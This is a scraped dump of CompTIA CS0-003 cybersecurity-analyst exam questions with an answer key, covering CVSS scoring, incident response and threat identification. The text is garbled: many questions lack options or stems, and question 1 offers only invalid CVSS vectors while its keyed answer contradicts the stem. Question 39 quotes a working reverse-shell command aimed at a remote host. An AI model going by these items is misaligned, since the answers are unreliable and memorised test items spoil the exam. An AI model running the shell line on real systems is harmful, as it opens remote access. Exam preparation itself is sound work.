CompTIA CS0-003 Exam
CompTIA CS0-003 Exam
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege
escalation, and has a significant impact to confidentiality and integrity but not to availability. Which
of the following CVE metrics would be most accurate for this zero-day threat?
A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Correct Answer: A
Question #2Topic 1
Which of the following tools would work best to prevent the exposure of PII outside of an
organization?
A. PAM
B. IDS
C. PKI
D. DLP
Correct Answer: D
Which of the following tuning recommendations should the security analyst share?
Correct Answer: B
Question #4Topic 1
Which of the following items should be included in a vulnerability scan report? (Choose two.)
A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan
Correct Answer: DE
Question #5Topic 1
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the
industry was happening approximately 45 days after a patch was released. Which of the following
would best protect this organization?
Correct Answer: A
Question #6Topic 1
A security analyst recently joined the team and is trying to determine which scripting language is
being used in a production script to determine if it is malicious. Given the following script:
Question #7Topic 1
A company's user accounts have been compromised. Users are also reporting that the company's
internal portal is sometimes only accessible through HTTP, other times; it is accessible through
HTTPS. Which of the following most likely describes the observed activity?
A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS
access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
Most Voted
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port
80
D. An error was caused by BGP due to new rules applied over the company's internal routers
Correct Answer: B
Question #8Topic 1
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company
security policies are shown below:
Security Policy 1006: Vulnerability Management
1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize
the remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company
shall prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over patching of
internally available system.
According to the security policy, which of the following vulnerabilities should be the highest priority
to patch?
A. Name: THOR.HAMMER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System
Correct Answer: B
Question #9Topic 1
Which of the following will most likely ensure that mission-critical services are available in the event
of an incident?
Correct Answer: C
Question #10Topic 1
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise.
Several high-risk cloud applications are used that increase the risk to the organization. Which of the
following solutions will assist in reducing the risk?
Correct Answer: A
Question #11Topic 1
An incident response team receives an alert to start an investigation of an internet outage. The outage
is preventing all users in multiple locations from accessing external SaaS resources. The team
determines the organization was impacted by a DDoS attack. Which of the following logs should the
team review first?
A. CDN
B. Vulnerability scanner
C. DNS Most Voted
D. Web server
Correct Answer: C
A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation
Correct Answer: D
Question #13Topic 1
An analyst finds that an IP address outside of the company network that is being used to run network
and vulnerability scans across external-facing assets. Which of the following steps of an attack
framework is the analyst witnessing?
A. Exploitation
B. Reconnaissance
C. Command and control
D. Actions on objectives
Correct Answer: B
Question #14Topic 1
An incident response analyst notices multiple emails traversing the network that target only the
administrators of the company. The email contains a concealed URL that leads to an unknown website
in another country. Which of the following best describes what is happening? (Choose two.)
A. Beaconing
B. Domain Name System hijacking
C. Social engineering attack
D. On-path attack
E. Obfuscated links
F. Address Resolution Protocol poisoning
Correct Answer: CE
Question #15Topic 1
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical
application. Which of the following recommendations would best mitigate this problem if applied
along the SDLC phase?
Correct Answer: C
Question #16Topic 1
An analyst is reviewing a vulnerability report and must make recommendations to the executive team.
The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime
window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the
company does not have access to. Which of the following inhibitors to remediation do these systems
and associated vulnerabilities best represent?
A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows
Correct Answer: B
Question #17Topic 1
The security team reviews a web server for XSS and runs the following Nmap scan:
Which of the following most accurately describes the result of the scan?
A. An output of characters > and " as the parameters used m the attempt
B. The vulnerable parameter ID http://172.31.15.2/1.php?id-2 and unfiltered characters returned
C. The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
D. The vulnerable parameter and characters > and " with a reflected XSS attempt
Correct Answer: D
Question #18Topic 1
Which of the following is the best action to take after the conclusion of a security incident to improve
incident response in the future?
Correct Answer: B
Question #19Topic 1
A security analyst received a malicious binary file to analyze. Which of the following is the best
technique to perform the analysis?
A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing
Correct Answer: B
Question #20Topic 1
An incident response team found IoCs in a critical server. The team needs to isolate and collect
technical evidence for further investigation. Which of the following pieces of data should be collected
first in order to preserve sensitive information before isolating the server?
A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address
Correct Answer: C
Question #21Topic 1
Which of the following security operations tasks are ideal for automation?
Correct Answer: B
Question #22Topic 1
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS,
which of the following groups should the organization report the breach to?
Correct Answer: D
Question #23Topic 1
Which of the following is the best metric for an organization to focus on given recent investments in
SIEM, SOAR, and a ticketing system?
A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts
Correct Answer: A
Question #24Topic 1
A company is implementing a vulnerability management program and moving from an on-premises
environment to a hybrid IaaS cloud environment. Which of the following implications should be
considered on the new hybrid environment?
Correct Answer: B
Question #25Topic 1
A security alert was triggered when an end user tried to access a website that is not allowed per
organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the
authentication logs, web logs, and temporary files, reflecting the web searches from the user's
workstation, to build the case for the investigation. Which of the following is the best way to ensure
that the investigation complies with HR or privacy policies?
A. Create a timeline of events detailing the date stamps, user account hostname and IP information
associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information Password protect the
evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access
will not be able to easily identify the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional
Correct Answer: B
Question #26Topic 1
Which of the following is the first step that should be performed when establishing a disaster recovery
plan?
Correct Answer: A
Question #27Topic 1
A technician identifies a vulnerability on a server and applies a software patch. Which of the
following should be the next step in the remediation process?
A. Testing
B. Implementation
C. Validation
D. Rollback
Correct Answer: C
A. Registry change
B. Rename computer
C. New account introduced
D. Privilege escalation
Correct Answer: C
Question #29Topic 1
A security program was able to achieve a 30% improvement in MTTR by integrating security controls
into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes
what the security program did?
A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass
Correct Answer: D
A. wh4dc-748gy.lan (192.168.86.152)
B. officerckuplayer.lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)
Correct Answer: E
Correct Answer: B
Question #32Topic 1
Which of the following describes how a CSIRT lead determines who should be communicated with
and when during a security incident?
A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any t me
D. Subject matter experts on the team should communicate with others within the specified area of
expertise
Correct Answer: A
Question #34Topic 1
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the
header to a known-malicious IP in another country. Which of the following describes what the analyst
has noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal
Correct Answer: A
Question #35Topic 1
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a
potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can
see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is
not showing the packets containing the file transfer itself. Which of the following can the analyst
perform to see the entire contents of the downloaded files?
Question #36Topic 1
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability
report two hours ago: but the report did not have a follow-up remediation response from an analyst.
Which of the following documents should the SOC manager review to ensure the team is meeting the
appropriate contractual obligations for the customer?
A. SLA
B. MOU
C. NDA
D. Limitation of liability
Correct Answer: A
Question #37Topic 1
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish
communication with a successfully exploited target?
Correct Answer: A
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Correct Answer: B
Question #39Topic 1
A security analyst detects an exploit attempt containing the following command: sh -i >&
/dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
Correct Answer: B
Question #40Topic 1
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely
available exploit being used to deliver ransomware. Which of the following factors would an analyst
most likely communicate as the reason for this escalation?
A. Scope
B. Weaponization
C. CVSS
D. Asset value
Correct Answer: B
Question #41Topic 1
An analyst is reviewing a vulnerability report for a server environment with the following entries:
Which of the following systems should be prioritized for patching first?
A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228 Most Voted
Correct Answer: D
Question #42Topic 1
A company is in the process of implementing a vulnerability management program, and there are
concerns about granting the security team access to sensitive data. Which of the following scanning
methods can be implemented to reduce the access to systems while providing the most accurate
vulnerability scan results?
Correct Answer: A
Question #43Topic 1
A security analyst is trying to identify anomalies on the network routing. Which of the following
functions can the analyst use on a shell script to achieve the objective most accurately?
Correct Answer: C
Question #44Topic 1
There are several reports of sensitive information being disclosed via file sharing services. The
company would like to improve its security posture against this threat. Which of the following
security controls would best support the company in this scenario?
Correct Answer: B
Question #45Topic 1
Which of the following is the best way to begin preparation for a report titled "What We Learned"
regarding a recent incident involving a cybersecurity breach?
A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics
Correct Answer: A
Question #46Topic 1
A security analyst is performing an investigation involving multiple targeted Windows malware
binaries. The analyst wants to gather intelligence without disclosing information to the attackers.
Which of the following actions would allow the analyst to achieve the objective?
Correct Answer: A
Question #47Topic 1
Which of the following would help to minimize human engagement and aid in process improvement
in security operations?
A. OSSTMM
B. SIEM
C. SOAR
D. OWASP
Correct Answer: C
A. Avoid
B. Transfer
C. Accept
D. Mitigate
Correct Answer: A
Question #49Topic 1
Which of the following is an important aspect that should be included in the lessons-learned step after
an incident?
Correct Answer: A
Question #50Topic 1
The security operations team is required to consolidate several threat intelligence feeds due to
redundant tools and portals. Which of the following will best achieve the goal and maximize results?
A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication
Correct Answer: A